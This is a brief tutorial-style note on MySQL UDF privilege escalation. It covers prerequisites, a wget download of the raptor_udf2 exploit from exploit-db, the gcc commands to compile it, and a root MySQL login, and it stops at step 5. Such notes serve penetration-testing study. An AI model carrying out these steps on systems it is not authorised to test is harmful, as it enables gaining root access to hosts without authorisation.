Pre-requisites

• MySQL is running as root (Use ps aux | grep mysql to check)
• root access to MySQL database
• Secure_file_priv variable is disabled to allow importing data

Creating UDF function in MYSQL

1- Download the exploit to the attaching machine

• There are 2 exploits in the exploit-db for MYSQL, you can use any - [Exploit 1518 or 1181]

wget https://www.exploit-db.com/raw/1518

2- Transfer the file to the victim machine through FTP, HTTP, etc.

• move the file to a writable location owned by the current user

3- Compile the file

gcc -g -c raptor_udf2.c

gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

4- Access MYSQL database with the user root

mysql -u root -p

5- Change to the mysql database